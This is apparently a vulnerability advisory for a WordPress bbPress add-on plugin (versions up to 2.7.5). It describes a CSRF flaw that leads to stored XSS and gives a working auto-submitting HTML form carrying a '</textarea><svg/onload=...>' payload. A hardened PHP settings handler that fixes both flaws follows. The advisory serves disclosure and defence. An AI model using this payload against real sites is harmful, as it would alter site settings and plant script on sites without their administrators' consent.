bbPress Login Register Links On Forum Topic Pages <= 2.7.5 - CSRF to Stored XSS



Description
The lack of CSRF checks in the plugin's settings allows arbitrary changes to the settings, which can also lead to stored XSS issues.
Proof of Concept
The payload below will result in a stored XSS in the 'Style Customize' page.

<html>
  <body onload="document.forms[0].submit()">
    <form action="http://127.0.0.1/wp-admin/admin.php?page=bbPressCustomPage" method="POST">
      <input type="hidden" name="bbpresscustomcss" value="</textarea><svg/onload=alert(/XSS/)>" />
      <input type="hidden" name="bpoptionsettinspanelsubmit" value="Submit" />
    </form>
  </body>
</html>
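
A settings handler that would reject the request above and render the stored value safely, as an added example (not the plugin's own code and not taken from the referenced changeset). The field names come from the proof of concept; the nonce action and field, the option name and the function names are hypothetical, and the code assumes it runs inside a WordPress plugin.

```php
<?php
// Added example: hardened save/render pair for a WordPress settings page.
// Field names are from the proof of concept; the constants and function
// names below are hypothetical.

const EX_NONCE_ACTION = 'example_save_custom_css'; // hypothetical
const EX_NONCE_FIELD  = 'example_css_nonce';       // hypothetical
const EX_OPTION       = 'example_custom_css';      // hypothetical

function example_save_settings() {
    if ( ! isset( $_POST['bpoptionsettinspanelsubmit'] ) ) {
        return; // not a settings submission
    }
    // Only administrators may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Dies unless the request carries a valid nonce for this action,
    // which a cross-site auto-submitting form cannot supply.
    check_admin_referer( EX_NONCE_ACTION, EX_NONCE_FIELD );

    $css = isset( $_POST['bbpresscustomcss'] )
        ? wp_unslash( $_POST['bbpresscustomcss'] )
        : '';
    // Custom CSS needs no markup, so strip tags before storing.
    update_option( EX_OPTION, wp_strip_all_tags( $css ) );
}
add_action( 'admin_init', 'example_save_settings' );

function example_render_settings() {
    $css = (string) get_option( EX_OPTION, '' );
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( EX_NONCE_ACTION, EX_NONCE_FIELD ); ?>
        <textarea name="bbpresscustomcss" rows="10" cols="60"><?php
            // Escape on output so a stored "</textarea>" cannot close the element.
            echo esc_textarea( $css );
        ?></textarea>
        <input type="submit" name="bpoptionsettinspanelsubmit" value="Submit" />
    </form>
    <?php
}
```

The nonce check addresses the CSRF half of the issue and the output escaping addresses the stored XSS half; either one alone leaves the other open.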

Affects Plugin

References

URL https://plugins.trac.wordpress.org/changeset/2217772

Classification

Type MULTI

Miscellaneous

Views 167164
Verified Yes
WPVDB ID 9983

Timeline

Publicly Published 2019-12-25 (5 months ago)
Added 2019-12-26 (5 months ago)
Last Updated 2019-12-26 (5 months ago)
